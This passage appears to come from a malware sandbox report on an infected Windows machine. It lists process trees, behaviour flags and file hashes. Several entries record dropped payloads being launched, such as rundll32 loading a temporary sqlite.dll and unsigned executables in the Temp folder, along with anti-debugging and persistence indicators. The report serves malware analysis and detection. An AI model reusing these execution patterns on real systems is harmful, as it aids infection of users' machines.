                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 456
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:1704
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                          PID:2228
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5504 -ip 5504
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 452 -p 6100 -ip 6100
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:5788
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            PID:1512
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              PID:6116
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 448
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                PID:5668
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 452 -p 6128 -ip 6128
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:5392
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 532 -p 5880 -ip 5880
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:5400
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1772 -ip 1772
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:2512
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6116 -ip 6116
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 612 -p 4092 -ip 4092
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:6284
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5652 -ip 5652
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:1504
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2852 -ip 2852
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:1328
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2632 -ip 2632
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:6276
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WaaSMedicAgent.exe d6fd3dedd822f8a94baad1d7e76fc7ce 1FPS8FyOPkmM3Jgu9Ybc4Q.0.1.0.3.0
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                              PID:4092
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6244 -ip 6244
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:6168
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1456 -ip 1456
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:5424
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2184 -ip 2184
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:5612
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3692 -ip 3692
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:5600
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1244 -ip 1244
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:3168
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2104 -ip 2104
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:6900
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5896 -ip 5896
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:5116
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 416 -ip 416
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7104 -ip 7104
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6612 -ip 6612
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:1092
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7DE2.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7DE2.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                PID:5620
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7DE2.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7DE2.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1488 -ip 1488
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6580 -ip 6580
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:6048
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\92A3.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\92A3.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                PID:6420
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\92A3.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\92A3.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:6356
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A5EE.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A5EE.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5252
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 276
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                      PID:6524
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C0BA.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C0BA.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:3256
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1488 -ip 1488
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                      PID:6020
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5860 -ip 5860
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                      PID:5900
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E4ED.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E4ED.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4392
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 292
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\91F.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\91F.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                        PID:6288
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 5252 -ip 5252
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                        PID:1948
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                        PID:6252
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:5528
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:1672
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4392 -ip 4392
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                            PID:2172
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:4280
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding E7B95CF364EED1A9C4CF7D8595452282 C
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1040
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding A604EAA2F31848A7FB366DC59223DD22
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3868
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 75509FE0B111CF915609A8D84A6C90B2 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5052
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                    PID:5892
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                    PID:1340
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 448
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                          PID:2960
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3936
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3808 -ip 3808
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2868

                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13045a98310.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            03fd2dc00f7d0692010f40a7068549fe

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            4b49f5beaf65f4718034d4049867c41fb4c2109f

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            edcc93671ea67eed0d4688c92670be18f9386cd8971da66cff4a1564c5c8f054

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            2b0c6d6c0a670b8747be58712972b2021f0dd253feaa4130c72a9b3ea8fa8250f5459d0869063d79626fd5551f04aa7844a8d5a818c32bf14eedd8869cedf058

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13045a98310.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            03fd2dc00f7d0692010f40a7068549fe

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            4b49f5beaf65f4718034d4049867c41fb4c2109f

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            edcc93671ea67eed0d4688c92670be18f9386cd8971da66cff4a1564c5c8f054

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            2b0c6d6c0a670b8747be58712972b2021f0dd253feaa4130c72a9b3ea8fa8250f5459d0869063d79626fd5551f04aa7844a8d5a818c32bf14eedd8869cedf058

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            2a2be74372dc3a5407cac8800c58539b

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            17ecc1e3253772cdf62ef21741336f3707ed2211

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            2b8b9dd101fc57f8d10ce4f074c0005df955634dbb7d9e49465f9054d66628a9

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            ce65803bfad71d248ce190a46846500a0ba637dca7909a25aab8b4f35d50a050722739e15b7e076881c026b7b6daf582d81069f6df948c0671f316239a221d68

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            2a2be74372dc3a5407cac8800c58539b

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            17ecc1e3253772cdf62ef21741336f3707ed2211

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            2b8b9dd101fc57f8d10ce4f074c0005df955634dbb7d9e49465f9054d66628a9

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            ce65803bfad71d248ce190a46846500a0ba637dca7909a25aab8b4f35d50a050722739e15b7e076881c026b7b6daf582d81069f6df948c0671f316239a221d68

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            279f10214e35b794dbffa3025ecb721f

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            ddfca6d15eb530213148e044c11edd37f6d6c212

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            7f210f9961b8ba954050558fa4b85120c876d304aae0d3edbb6576f0fa2661be

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            069e0720289c49cf206f7636d0f028d9e777fa273595b84fa4edfa66b92bef5c0dd8ba2fed2beb9a3f145b40909430fa9900484e630928db9d1e9018198829d7

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            279f10214e35b794dbffa3025ecb721f

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            ddfca6d15eb530213148e044c11edd37f6d6c212

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            7f210f9961b8ba954050558fa4b85120c876d304aae0d3edbb6576f0fa2661be

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            069e0720289c49cf206f7636d0f028d9e777fa273595b84fa4edfa66b92bef5c0dd8ba2fed2beb9a3f145b40909430fa9900484e630928db9d1e9018198829d7

                                                                                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                            279f10214e35b794dbffa3025ecb721f

                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                            ddfca6d15eb530213148e044c11edd37f6d6c212

                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                            7f210f9961b8ba954050558fa4b85120c876d304aae0d3edbb6576f0fa2661be

                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                            069e0720289c49cf206f7636d0f028d9e777fa273595b84fa4edfa66b92bef5c0dd8ba2fed2beb9a3f145b40909430fa9900484e630928db9d1e9018198829d7

                                                                                                                                                                                                                                                                                                                                                            Download Submit

